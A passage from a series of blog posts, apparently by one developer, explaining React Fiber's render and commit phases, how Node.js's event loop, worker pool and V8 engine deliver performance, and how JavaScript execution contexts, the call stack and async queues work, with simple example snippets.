    ├── Profile
    └── Dashboard

Traversal:

Root → App → h2 (leaf) → Profile (sibling) → Dashboard (sibling) → App (parent) → Root

At each node, Begin Work → then, after children → Complete Work.

Phase 2: Commit Phase (Synchronous)

Once the Render Phase is done, React has:

A complete WIP Fiber Tree
An Effect List with all nodes needing DOM updates

Now, React enters the Commit Phase, which is synchronous and uninterruptible.

It walks the Effect List and performs:

Insertions
Updates
Deletions

On the Real DOM.

Then, it swaps WIP Tree → becomes new Current Tree.

Update Phase, How Priorities Work

When state updates:

React creates an Update Object → { payload, timestamp, lane }
Enqueues it in the component’s update queue
Marks the Fiber Node (and all ancestors) as “needing work”
Schedules the update based on lane (priority)

Example:

// High priority
setName("Shafique"); // Sync Lane

// Low priority
startTransition(() => {
  setLoading(true); // Transition Lane
});

React’s Scheduler:

Checks which updates are pending
Assigns priority: Sync, Transition, Idle
Executes high-priority first

So when you click the button:

React creates a WIP(work-in-progress) tree
Processes setName("Shafique") → updates Profile
Skips setLoading(true) for now (low priority)
Commits → UI updates immediately
Later — starts new WIP tree → processes setLoading(true) → commits Dashboard update

The user sees instant feedback, and background work occurs later.

Fiber’s Real Power

Work is split into chunks → doesn’t block the main thread
High-priority work (user input) jumps the queue
Low priority work (data loading) waits — but doesn’t block
Browser gets breathing room → stays responsive

Even though Fiber adds more steps, it makes the right steps happen at the right time.

How Node.js Achieves High Performance & Scalability

Shafiq Ur Rehman — Sat, 20 Sep 2025 06:25:36 +0000

What is Node.js?

Node.js is an open-source JavaScript runtime environment that allows you to develop scalable web applications (accessible on the internet, without requiring installation on the user's device). This environment is built on top of Google Chrome’s JavaScript Engine V8. It uses an event-driven(waits for things to happen and then reacts to them), non-blocking I/O model(sends I/O requests and continuously does other work, notified when done), making it lightweight, more efficient, and perfect for data-intensive real-time applications running across shared devices.

Non-Blocking I/O: The Performance Game-Changer

Runs on the side stack (callback queue/microtask queue).
The main thread does not wait, async operations run in the background, and their callbacks execute later.
Example:

const fs = require('fs');
fs.readFile('file.txt', (err, data) => {     // Non-blocking
console.log(”This runs after the file reading is completes” , data);
});
console.log("This runs immediately");

 Here, console.log("This runs immediately") executes first, and the file reading happens in the background.

Node.js Architecture Overview

This architecture is mainly based on 5 key components:

1️⃣ Single Thread

2️⃣ Event Loop

3️⃣ Event Queue

4️⃣ Worker Pool (Libuv)

5️⃣ V8 Engine

Single Thread
Node.js operates in a single-threaded environment. This means:

Only one thread executes JavaScript code.

This thread handles the main event loop.

This is why Node.js is lightweight.

In simple terms, a single thread handles requests from multiple users, resulting in low memory usage.

The Event Loop: Node.js’s Secret Weapon
The event loop runs indefinitely and connects the call stack, the microtask queue, and the callback queue. The event loop moves asynchronous tasks from the microtask queue and the callback queue to the call stack whenever the call stack is empty.

Callback Queue:
Callback functions for operations like setTimeout() are added here before moving to the call stack.

Microtask Queue:
Callback functions for Promises and MutationObserver are queued here and have higher priority.

Event Queue
When asynchronous operations (like HTTP requests, database queries) are performed:

Node.js places them in the event queue.

The event loop then processes this queue when the main thread is free.

Offloading Heavy Work: Libuv & Worker Pool
Node.js is single-threaded, but that doesn’t mean it can’t do parallel work.

For blocking I/O tasks (file system, DNS, crypto, compression), Node.js uses Libuv’s Worker Pool, a pool of 4 background threads (configurable) that handle heavy lifting.

Why This Matters for Performance: Your main thread stays free to handle new requests. I/O-bound tasks run in parallel without blocking JavaScript execution. CPU-bound tasks? Use worker_threads or offload to microservices.

In simple terms, Node.js's single thread handles the main application logic, while heavy tasks are handled in the background by the worker pool.

V8 Engine: Raw Speed Under the Hood
Node.js runs on Google’s V8 JavaScript Engine, the same engine that powers Chrome.

Performance Benefits: Just-In-Time Compilation: Converts JS to optimized machine code at runtime. Dynamic Optimization: Frequently used functions get turbocharged. Garbage Collection: Efficient memory management prevents leaks and slowdowns. V8 is why Node.js apps start fast, run fast, and stay fast, even under heavy load.

Event Loop -> Immediate processing for non-blocking tasks or delegation to the Worker Pool for heavy tasks -> Response." width="397" height="515">

Node.js Flow Example:

1️⃣ A user sends an API request.

2️⃣ Node.js receives the request.

3️⃣ If the request involves:

A non-heavy CPU task is executed directly via the event loop.

A heavy task (like reading a file) is sent to the worker pool.

4️⃣ While the task is processing, the event loop continues to handle other requests.

5️⃣ Once the task is complete, its callback function is placed in the event queue.

6️⃣ The event loop picks up the callback and executes it.

7️⃣ Node.js sends the response back to the user.

Pro Tips for Optimizing Node.js Performance

Never Use Sync APIs
→ readFileSync and writeFileSync will destroy your server's throughput.

Use Async/Await or Promises
→ Less messy, faster, and easier to debug than callbacks.

Cluster Your App
→ Utilize all CPU cores using the cluster module.

Offload CPU Work
→ Leverage worker_threads for heavy computation.

Use Caching & Streaming
→ Minimize I/O roundtrips. Stream large files instead of loading into memory.

Final Thought

Node.js doesn’t achieve high performance by throwing more hardware at the problem; it does so by being intelligent with resources. Its event-driven, non-blocking model is purpose-built for modern, I/O-heavy applications.

Master these concepts, avoid blocking code, and you’ll unlock Node.js’s true potential: a server that’s fast, lean, and ready to scale

JavaScript Execution Context Made Simple

Shafiq Ur Rehman — Thu, 21 Aug 2025 10:19:34 +0000

A JavaScript engine is a program that converts JavaScript code into a Binary Language. Computers understand the Binary Language. Every web browser contains a JavaScript engine. For example, V8 is the JavaScript engine in Google Chrome.

Let's dive in!

Execution context: Execution Context is the environment in which JS code runs. It decides what variables and functions are accessible, and how the code executes. It has two types (Global & Function) and works in two phases (Memory Creation & Code Execution).

1. Global Execution Context (GEC)

This is created once when your script starts. It's the outermost context where:

Global variables and functions are stored
this refers to the global object (like window in browsers)

2. Function Execution Context (FEC)

When you call a function, a new context is created specifically for that function. It manages:

The function's local variables
The value of this inside the function
Arguments passed to the function

3. Memory Creation Phase

This is the first phase of an execution context. During this phase:

All variables and functions are allocated in memory
Functions are fully hoisted (stored with their complete code)
Variables declared with var are hoisted and initialized with undefined
Variables declared with let and const are also hoisted but remain uninitialized, staying in the Temporal Dead Zone (TDZ) until their declaration is reached

4. Code Execution Phase

This is the second phase, where:

The code executes line by line
Variables receive their actual values
Functions are called when invoked

The Variable Environment is a part of the Execution Context.
It is where all variables, functions, and arguments are stored in memory as key-value pairs during the Memory Creation Phase.

It includes:
- Variable declarations
- Function declarations
- Function parameters
It is used internally by the JS engine to track what's defined in the current scope.
Call stack: The call stack is a part of the JavaScript engine that helps keep track of function calls. When a function is invoked, it is pushed to the call stack, where its execution begins. When the execution is complete, the function is popped off the call stack. It utilizes the concept of stacks in data structures, following the Last-In-First-Out (LIFO) principle.
Event loop: The event loop runs indefinitely and connects the call stack, the microtask queue, and the callback queue. The event loop moves asynchronous tasks from the microtask queue and the callback queue to the call stack whenever the call stack is empty.
In JavaScript’s event loop, microtasks always have higher priority than macrotasks (callback queue).
Callback Queue (Macrotask Queue): Callback functions for setTimeout() are added to the callback queue before they are moved to the call stack for execution.

Includes:

setTimeout()
setInterval()
setImmediate()
I/O events
Microtask queue: Asynchronous callback functions for promises and mutation observers are queued in the microtask queue before they are moved to the call stack for execution.
Includes things like:
- Promise.then()
- Promise.catch()
- Promise.finally()
- MutationObserver

Synchronous JavaScript

JavaScript is synchronous, blocking, and single-threaded. This means the JavaScript engine executes code sequentially—one line at a time from top to bottom—in the exact order of the statements.

Consider a scenario with three console.log statements.

console.log("First line");
console.log("Second line");
console.log("Third line");

Output:
First line
Second line
Third line

Let's examine another example:

function getName(name) {
  return name;
}

function greetUser() {
  const userName = getName("Shafiq Ur Rehman");
  console.log(`Hello, ${userName}!`);
}

greetUser();

A new global execution context is created and pushed onto the call stack. This is the main execution context where the top-level code runs. Every program has only one global execution context, and it always stays at the bottom of the call stack.
In the global execution context, the memory creation phase starts. In this phase, all variables and functions declared in the program are allocated space in memory (called the variable environment). Since we don’t have variables declared in the global scope, only the functions will be stored in memory.
The function getName is stored in memory, with its reference pointing to the full function body. The code inside it isn’t executed yet—it will run only when the function is called.
Similarly, the function greetUser is stored in memory, with its reference pointing to its entire function body.
When the greetUser function is invoked, the code execution phase of the global execution context begins. A new execution context for greetUser is created and pushed on top of the call stack. Just like any execution context, it first goes through the memory allocation phase.
Inside greetUser, the variable userName is allocated space in memory and initialized with undefined. (Note: During memory creation, variables declared with var are initialized with undefined, while variables declared with let and const are set as uninitialized, which leads to a reference error if accessed before assignment.)
After the memory phase finishes, the code execution phase starts. The variable userName needs the result of the getName function call. So getName is invoked, and a new execution context for getName is pushed onto the call stack.
The function getName allocates space for its parameter name, initializes it with undefined, and then assigns it the value "Shafiq Ur Rehman". Once the return statement runs, that value is returned to the greetUser context. The getName execution context is then popped off the call stack. Execution goes back to greetUser, where the returned value is assigned to userName. Next, the console.log statement runs and prints:
```
Hello, Shafiq Ur Rehman!
```
Once done, the greetUser The execution context is also popped off the call stack.
Finally, the program returns to the global execution context. Since there’s no more code left to run, the global context is popped off the call stack, and the program ends.

Asynchronous JavaScript

Unlike synchronous operations, asynchronous operations don't block subsequent tasks from starting, even if the current task isn't finished. The JavaScript engine works with Web APIs (like setTimeout, setInterval, etc.) in the browser to enable asynchronous behavior.

Using Web APIs, JavaScript offloads time-consuming tasks to the browser while continuing to execute synchronous operations. This asynchronous approach allows tasks that take time (like database access or file operations) to run in the background without blocking the execution of subsequent code.

Let’s break this down with a setTimeout() example. (I’ll skip memory allocation here since we already covered it earlier.)

console.log("first");

setTimeout(() => {
  console.log("second");
}, 3000);

console.log("third");

Here’s what happens when this code runs:

The program starts with a global execution context created and pushed onto the call stack.
The first line console.log("first") runs. It creates an execution context, prints "first" to the console, and then is popped off the stack.
Next, the setTimeout() function is called. Since it’s a Web API provided by the browser, it doesn’t run fully inside the call stack. Instead, it takes two arguments: a callback function and a delay (3000ms here). The browser registers the callback function in the Web API environment, starts a timer for 3 seconds, and then setTimeout() itself is popped off the stack.
Execution moves on to console.log("third"). This prints "third" immediately, and that context is also popped off.
Meanwhile, the callback function from setTimeout is sitting in the Web API environment, waiting for the 3-second timer to finish.
Once the timer completes, the callback doesn’t go straight to the call stack. Instead, it’s placed into the callback queue. This queue only runs when the call stack is completely clear. So even if you had thousands of lines of synchronous code after setTimeout, they would all finish first.
The event loop is the mechanism that keeps watching the call stack and the queues. When the call stack is empty, the event loop takes the callback from the queue and pushes it onto the stack.
Finally, the callback runs: console.log("second") prints "second" to the console. After that, the callback function itself is popped off, and eventually, the global execution context is cleared once everything has finished.

Conclusion

JavaScript runs code synchronously but can handle async tasks using browser Web APIs. Knowing how the engine works under the hood is key to mastering the language.

“Let me know your thoughts in the comments,” or “Follow me for more JavaScript insights.”